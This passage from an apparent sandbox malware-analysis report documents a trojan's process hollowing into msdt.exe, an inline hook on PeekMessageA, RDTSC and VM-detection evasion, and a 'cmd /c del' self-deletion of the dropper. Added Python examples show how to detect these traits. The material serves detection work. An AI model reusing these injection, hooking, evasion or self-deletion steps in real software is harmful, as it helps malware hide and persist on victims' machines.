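    for idx, (caller, api, target) in enumerate(events):
        if target == caller:
            continue                    # calls on the caller's own process are ordinary
        for stage, apis in HOLLOWING_STAGES:
            if api in apis and stage not in first_seen[target]:
                first_seen[target][stage] = idx
    verdicts = {}
    for target, stages in first_seen.items():
        if all(s in stages for s in MANDATORY):
            order = [stages[s] for s in MANDATORY]
            if order == sorted(order):
                verdicts[target] = sorted(stages, key=stages.get)
    return verdicts


# Constructed trace. PIDs are the report's; which process each call targeted
# is not in the report and is assumed here: the sample maps itself into
# explorer.exe and queues an APC, explorer.exe then creates and hollows
# msdt.exe.
SAMPLE_TRACE = [
    (6000, "NtCreateSection",         6000),
    (6000, "NtMapViewOfSection",      3452),
    (6000, "NtQueueApcThread",        3452),
    (3452, "NtCreateProcessEx",       5148),
    (3452, "NtUnmapViewOfSection",    5148),
    (3452, "NtAllocateVirtualMemory", 5148),
    (3452, "NtWriteVirtualMemory",    5148),
    (3452, "NtWriteVirtualMemory",    5148),
    (3452, "NtSetContextThread",      5148),
    (3452, "NtResumeThread",          5148),
    (5148, "NtReadVirtualMemory",     3452),
]

if __name__ == "__main__":
    for pid, stages in hollowing_verdict(SAMPLE_TRACE).items():
        print(f"pid {pid} hollowed: {' -> '.join(stages)}")
```

The section mapping plus APC into explorer.exe is deliberately not reported as hollowing: no process is created and nothing is resumed, so it is the separate "maps a memory area into another process / queues an APC" pattern and needs its own rule. Ordering matters for precision: a debugger or an installer may write into a child and resume it, but it does not set the thread context after writing a fresh image, and it does not unmap the child first.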
Source: 7pECKdsaig.exe Static PE information: No import functions for PE file found
Source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000002.289263472.000000000199F000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000167C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs 7pECKdsaig.exe
Source: 7pECKdsaig.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 7pECKdsaig.exe Static PE information: Section .text
Source: 7pECKdsaig.exe ReversingLabs: Detection: 76%
Source: 7pECKdsaig.exe Virustotal: Detection: 59%
Source: 7pECKdsaig.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\7pECKdsaig.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\7pECKdsaig.exe C:\Users\user\Desktop\7pECKdsaig.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\7pECKdsaig.exe"
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock
Source: classification engine Classification label: mal100.troj.evad.winEXE@6/1@4/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
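The process tree above is the part of this report that survives a repack: explorer.exe starts msdt.exe with nothing on its command line, and msdt.exe then runs cmd.exe /c del against the original sample so the dropper disappears once the hollowed host is running. Added example, not part of the report: a triage over Sysmon-style process-creation records that flags a watched system binary launched with a bare command line and a cmd /c del whose target is the image of a process seen in the same tree. The records are constructed; PIDs for the sample, explorer.exe, msdt.exe and conhost.exe follow the report, while cmd.exe's PID, the explorer.exe record and the sample's parent are assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation records following the process
# tree in the report. cmd.exe's PID, the explorer.exe record and the
# sample's parent are assumptions; the rest is taken from the report.
SAMPLE_EVENTS = [
    {"pid": 3452, "ppid": 0,    "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 6000, "ppid": 3452, "image": r"C:\Users\user\Desktop\7pECKdsaig.exe",
     "cmdline": r"C:\Users\user\Desktop\7pECKdsaig.exe"},
    {"pid": 5148, "ppid": 3452, "image": r"C:\Windows\SysWOW64\msdt.exe",
     "cmdline": r"C:\Windows\SysWOW64\msdt.exe"},
    {"pid": 5600, "ppid": 5148, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Users\user\Desktop\7pECKdsaig.exe"'},
    {"pid": 3660, "ppid": 5600, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# System binaries that only have business running with a task on their
# command line. A bare launch is what a loader produces when it needs a
# signed host to hollow. msdt.exe is the host in this report; extend the
# set with the hosts you observe.
WATCHED_HOSTS = {"msdt.exe"}

DEL_RE = re.compile(r'\bdel\b\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def ancestry(events, pid):
    """Image basenames from the root of the tree down to pid."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(ntpath.basename(by_pid[pid]["image"]).lower())
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def has_no_arguments(event):
    """True when the command line is nothing but the image path."""
    return event["cmdline"].strip().strip('"').lower() == event["image"].lower()


def triage(events):
    """Findings for bare host launches and for cmd /c del of an executed image."""
    executed = {e["image"].lower(): e["pid"] for e in events}
    findings = []
    for e in events:
        name = ntpath.basename(e["image"]).lower()
        chain = " > ".join(ancestry(events, e["pid"]))
        if name in WATCHED_HOSTS and has_no_arguments(e):
            findings.append({"pid": e["pid"], "rule": "bare_host_launch", "detail": chain})
        if name == "cmd.exe":
            m = DEL_RE.search(e["cmdline"])
            if m:
                target = (m.group(1) or m.group(2)).lower()
                if target in executed:
                    findings.append({"pid": e["pid"], "rule": "deletes_executed_image",
                                     "detail": f"pid {executed[target]} image, via {chain}"})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['rule']:24} pid {f['pid']}: {f['detail']}")
```

Tying the del target back to an image that actually ran is what keeps the second rule quiet on ordinary batch scripts that clean temporary files; the first rule will fire on a user who starts msdt.exe by hand, so treat it as a candidate list to join with the injection and network findings rather than an alert on its own.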
Source: 7pECKdsaig.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: msdt.pdbGCTL source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 7pECKdsaig.exe, 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: msdt.pdb source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9798E push cs; retf 0_2_00A979AB
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9719C push esp; retf 0_2_00A971D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A979D3 push esi; ret 0_2_00A979F3
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A96911 push edi; ret 0_2_00A96912
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9F110 push ecx; ret 0_2_00A9F125
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D4A5 push eax; ret 0_2_00A9D4F8
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D4FB push eax; ret 0_2_00A9D562
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D4F2 push eax; ret 0_2_00A9D4F8
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A9D55C push eax; ret 0_2_00A9D562
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0176D0D1 push ecx; ret 0_2_0176D0E4
Source: C:\Windows\explorer.exe Code function: 1_2_0E176B1E push esp; retn 0000h 1_2_0E176B1F
Source: C:\Windows\explorer.exe Code function: 1_2_0E176B02 push esp; retn 0000h 1_2_0E176B03
Source: C:\Windows\explorer.exe Code function: 1_2_0E1769B5 push esp; retn 0000h 1_2_0E176AE7
Source: C:\Windows\explorer.exe Code function: 1_2_100DBB02 push esp; retn 0000h 1_2_100DBB03
Source: C:\Windows\explorer.exe Code function: 1_2_100DBB1E push esp; retn 0000h 1_2_100DBB1F
Source: C:\Windows\explorer.exe Code function: 1_2_100DB9B5 push esp; retn 0000h 1_2_100DBAE7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_04B1D0D1 push ecx; ret 2_2_04B1D0E4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059E158 push 150B24F0h; iretd 2_2_0059E15F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059F11E push ecx; ret 2_2_0059F125
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_00596911 push edi; ret 2_2_00596912
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_005979D3 push esi; ret 2_2_005979F3
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059719C push esp; retf 2_2_005971D0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059798E push cs; retf 2_2_005979AB
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059E224 pushfd ; ret 2_2_0059E22A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D4FB push eax; ret 2_2_0059D562
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D4F2 push eax; ret 2_2_0059D4F8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D4A5 push eax; ret 2_2_0059D4F8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 2_2_0059D55C push eax; ret 2_2_0059D562
Source: initial sample Static PE information: section name: .text entropy: 7.409588215160137

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE1
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
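The user-mode code change reported above means that explorer.exe's mapped copy of user32!PeekMessageA no longer begins with the bytes the DLL has on disk; an inline hook on a message-loop API is consistent with the keystroke capture FormBook is known for. Added example, not part of the report: compare each exported function's prologue in memory against the DLL on disk, then name the stub when the start matches a shape hooking engines write (jmp rel32, jmp [rip+disp32], push/ret, mov rax/jmp rax, int3). The six PeekMessageA bytes in memory are the ones the report prints; the on-disk prologues, the addresses and the other two functions are constructed. On a live host the memory bytes come from ReadProcessMemory and the disk bytes from the matching DLL copy, System32 for 64-bit processes such as explorer.exe and SysWOW64 for 32-bit ones such as the msdt.exe here.

```python
# Stub shapes hooking engines write at a function's first bytes. Each
# test receives the in-memory prologue padded to 16 bytes.
HOOK_STUBS = (
    ("jmp rel32",               lambda b: b[0] == 0xE9),
    ("jmp [rip+disp32]",        lambda b: b[:2] == b"\xFF\x25"),
    ("push imm32; ret",         lambda b: b[0] == 0x68 and b[5] == 0xC3),
    ("mov rax, imm64; jmp rax", lambda b: b[:2] == b"\x48\xB8" and b[10:12] == b"\xFF\xE0"),
    ("int3",                    lambda b: b[0] == 0xCC),
)


def hook_target(b, address):
    """Absolute address a recognised stub transfers to, else None."""
    if b[0] == 0xE9:
        return address + 5 + int.from_bytes(b[1:5], "little", signed=True)
    if b[0] == 0x68 and b[5] == 0xC3:
        return int.from_bytes(b[1:5], "little")
    if b[:2] == b"\x48\xB8" and b[10:12] == b"\xFF\xE0":
        return int.from_bytes(b[2:10], "little")
    return None


def check_prologue(name, address, disk, memory):
    """Compare the bytes mapped in the process with the same bytes from the
    DLL on disk, then name the stub if the start matches a known shape."""
    n = min(len(disk), len(memory))
    diff = next((i for i in range(n) if disk[i] != memory[i]), None)
    padded = bytes(memory).ljust(16, b"\0")
    stub = next((label for label, match in HOOK_STUBS if match(padded)), None)
    return {"function": name, "modified": diff is not None, "first_diff": diff,
            "stub": stub, "target": hook_target(padded, address)}


def scan(snapshot):
    """Only the functions whose in-memory prologue differs from disk."""
    return [r for r in (check_prologue(*entry) for entry in snapshot) if r["modified"]]


# Constructed snapshot: (function, address, bytes on disk, bytes in memory).
# The PeekMessageA in-memory bytes are the six the report prints for
# explorer.exe; the on-disk prologues, addresses and the other functions
# are made up for the example.
BASE = 0x7FFB1E1C0000
SNAPSHOT = [
    ("user32!PeekMessageA", BASE + 0x100,
     bytes.fromhex("48895c2408574883ec20"),
     bytes.fromhex("488bb8800ee1")),
    ("user32!GetMessageA", BASE + 0x400,
     bytes.fromhex("4883ec28488bd9"),
     bytes.fromhex("e9fb0f0000") + bytes.fromhex("8bd9")),   # jmp +0xFFB, then the tail
    ("user32!SendMessageA", BASE + 0x700,
     bytes.fromhex("48895c2410"),
     bytes.fromhex("48895c2410")),
]

if __name__ == "__main__":
    for r in scan(SNAPSHOT):
        where = f"-> {r['target']:#x}" if r["target"] is not None else "no known stub"
        print(f"{r['function']}: modified at byte {r['first_diff']}, {r['stub'] or where}")
```

The disk comparison is the check that matters: the PeekMessageA bytes match none of the stub shapes, and a scanner that only pattern-matched trampolines would have reported nothing. Expect benign differences as well, from hotpatch padding, relocated absolute operands in non-ASLR 32-bit modules, and hooks planted by EDR or by the sandbox itself, so resolve each hook target to the module that owns it before calling the change malicious.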

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\7pECKdsaig.exe RDTSC instruction interceptor: First address: 0000000000A89904 second address: 0000000000A8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7pECKdsaig.exe RDTSC instruction interceptor: First address: 0000000000A89B6E second address: 0000000000A89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000589904 second address: 000000000058990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000589B6E second address: 0000000000589B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A89AA0 rdtsc 0_2_00A89AA0
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 865
Source: C:\Windows\SysWOW64\msdt.exe API coverage: 9.7 %
Source: C:\Users\user\Desktop\7pECKdsaig.exe Process information queried: ProcessInformation
Source: explorer.exe, 00000001.00000003.289061192.00000000084D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000003.461296315.000000000683A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.263735895.00000000081DD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
Source: explorer.exe, 00000001.00000002.523833052.0000000006710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000001.00000003.461216185.000000000F53F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.530259036.000000000F54E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: explorer.exe, 00000001.00000000.263735895.0000000008304000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000003.462488828.00000000084D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60101a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir~
Source: explorer.exe, 00000001.00000000.263735895.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: explorer.exe, 00000001.00000002.525713546.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000001.00000002.525713546.0000000008200000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_00A89AA0 rdtsc 0_2_00A89AA0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B171 mov eax, dword ptr fs:[00000030h] 0_2_0171B171
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B171 mov eax, dword ptr fs:[00000030h] 0_2_0171B171
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171C962 mov eax, dword ptr fs:[00000030h] 0_2_0171C962
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173B944 mov eax, dword ptr fs:[00000030h] 0_2_0173B944
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173B944 mov eax, dword ptr fs:[00000030h] 0_2_0173B944
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174513A mov eax, dword ptr fs:[00000030h] 0_2_0174513A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174513A mov eax, dword ptr fs:[00000030h] 0_2_0174513A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h] 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h] 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h] 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h] 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01734120 mov ecx, dword ptr fs:[00000030h] 0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719100 mov eax, dword ptr fs:[00000030h] 0_2_01719100
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719100 mov eax, dword ptr fs:[00000030h] 0_2_01719100
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01719100 mov eax, dword ptr fs:[00000030h] 0_2_01719100
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B1E1 mov eax, dword ptr fs:[00000030h] 0_2_0171B1E1
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B1E1 mov eax, dword ptr fs:[00000030h] 0_2_0171B1E1
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0171B1E1 mov eax, dword ptr fs:[00000030h] 0_2_0171B1E1
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017A41E8 mov eax, dword ptr fs:[00000030h] 0_2_017A41E8
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h] 0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h] 0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h] 0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h] 0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017461A0 mov eax, dword ptr fs:[00000030h] 0_2_017461A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017461A0 mov eax, dword ptr fs:[00000030h] 0_2_017461A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017969A6 mov eax, dword ptr fs:[00000030h] 0_2_017969A6
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01742990 mov eax, dword ptr fs:[00000030h] 0_2_01742990
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174A185 mov eax, dword ptr fs:[00000030h] 0_2_0174A185
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0173C182 mov eax, dword ptr fs:[00000030h] 0_2_0173C182
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E1074 mov eax, dword ptr fs:[00000030h] 0_2_017E1074
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017D2073 mov eax, dword ptr fs:[00000030h] 0_2_017D2073
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01730050 mov eax, dword ptr fs:[00000030h] 0_2_01730050
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01730050 mov eax, dword ptr fs:[00000030h] 0_2_01730050
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h] 0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h] 0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h] 0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h] 0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h] 0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h] 0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h] 0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h] 0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h] 0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E4015 mov eax, dword ptr fs:[00000030h] 0_2_017E4015
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_017E4015 mov eax, dword ptr fs:[00000030h] 0_2_017E4015
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 0_2_01797016 mov eax, dword ptr fs:[00000030h] 0_2_01797016
